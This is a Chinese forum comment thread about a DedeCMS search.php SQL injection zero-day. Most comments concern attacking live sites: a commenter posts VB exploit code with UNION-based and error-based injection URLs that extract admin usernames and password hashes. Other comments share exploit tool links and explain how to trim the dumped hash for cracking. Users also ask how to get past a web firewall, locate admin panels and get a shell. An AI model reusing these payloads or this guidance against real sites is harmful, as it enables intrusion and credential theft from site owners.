好东西,WB感谢了

请洞主自查身边人，或者是不是有人其他人也挖到了，然后在那到处乱打：）

好东西啊~~~不过这个密文怎么解密= =

@鬼哥 有什么好办法能利用注入点 构造语句来爆绝对路径呢

如果加了安全狗 怎么办？

关键字长度必须要3-30字节之间！

第二步爆出来的密文后面还带三个省略号的是不全面的密文  怎么办？？？？！@鬼哥

想知道如何解密。。

好东西

不知道楼主是不是最先发现的.我看了知道创宇的微博也分析了下.
觉得最先发现的应该是白盒搜索某个关键字,然后逆向找调用发现的.
之后高价卖到黑市,那些买家不靠谱明明可以post的偏偏get提交,最后被人抓到漏洞了.
既然楼主没用来黑站,那么人家抓的样本就不是你的撒,就不必生气了...

以上只是个人yy,楼主白加黑发现这么好的漏洞确实牛...

@小威 dede本来就是20位的密文,去掉前3位和最后一位就行了,那三个省略号不用管的

求大牛私信爆后台方法!有交换的

好JJ

@冷静 谢谢 还有就是好多站提示 “关键字长度必须要3-30字节之间！”

NB，已感谢

@冷静 铜球

分析

$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;



if(isset($typeArr) && is_array($typeArr))
    {
        foreach($typeArr as $id=>$typename)

<font color=”Red”>$typeid = $id; </font> //这里变量覆盖

@鬼哥 转载了

谢谢大牛发0day 根据这个写了个程序 勿喷

下载地址

找不到后台怎么破- -

@八云幽紫 同样问题！！

漏洞很给力，后台很难找，要是能爆出后台的话，DEDE后台GETSHELL还是比较简单的！

楼下继续报后台。。。。。

@小威 我都是打admin

@小威 噗 易语言写的吗0 0

http://www.1818tt.com/thread-14083-1-1.html

╮(╯▽╰)╭ ↑ 看到上面这个我还真笑了

写了个另外的EXP 如果有要的话我就发上来...写得不好= =

唔 其实写这个东西的过程中我发现点问题
        Dim testVal As String = "/plus/search.php?keyword=as&typeArr[ uNion ]=a "
       Dim exp1 As String = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a"
       Dim exp2 As String = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a"
       ...
本来想用testVal的提交返回的内容来判断 可是发现那个并不是特好使 我就
Dim tmp As String = functions.GetPage(url + exp2)截取一遍
然后tmp = functions.GetPage(url + exp1)截取一遍
顺便把那个密文给掐头去尾变成16位了..

给力，！！！

@Say 这个看起来牛X好多 小菜鸟不懂高深语言 大牛莫笑

@小威 汗我不是大牛，VB比易语言要简单一些的...~

需要的话我把源码发给你~

各种工具已收下，爆后台我会乱说？

牛的很哦

请问楼主这是什么情况？
DedeCMS Error Warning!
Technical Support: http://bbs.dedecms.com

Error page: /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
Error infos: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,2' at line 1
Error sql: SELECT channeltype FROM `www_arctype` WHERE id=11=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `www_admin`#@`\'` LIMIT 0,1;


模板文件不存在，无法解析！

下次提到乌云给个响应时间吧

@鬼哥 模板文件不存在，无法解析！

该漏洞官方早在2013-01-1推出了安全补丁！看来补丁推广要加强啊，附件上官方补丁：http://bbs.dedecms.com/572667.html

这BUG封了没呢。

我想说有人拿去卖500，，，吓死我了

benchmark函数不可用   where也过滤了

我只想说 我被狗狗 秒杀了

@小威 测试工具似乎有些问题

怎么感觉这个漏洞就没流行过

@lxsec 嗯 只用了第二步 对好多站都测不出

@小威 代码能否借来 一看

@lxsec GET一下不就有了 = =

公布几个MJJ的转载：
http://hi.baidu.com/yu1u0/item/c0c60d1e6a17ce8ffeded5d7
http://www.uedbox.com/dedecms-injection-exp-allkill/
http://www.1818tt.com/thread-14083-1-1.html

@小胖子 怎么找，求方法

@lxsec www.foxck.com

@小威 前去三 后减1吧！

5.5

真速度。

@Say 求放！

@Say 去前三，去后一

我会告诉你们哪里有 dedecms么？

http://hiw3.com/api/cms/exp-dedecms/1

收了

收了!

@Say 发来看下  [email protected] Tks

mark,成功一发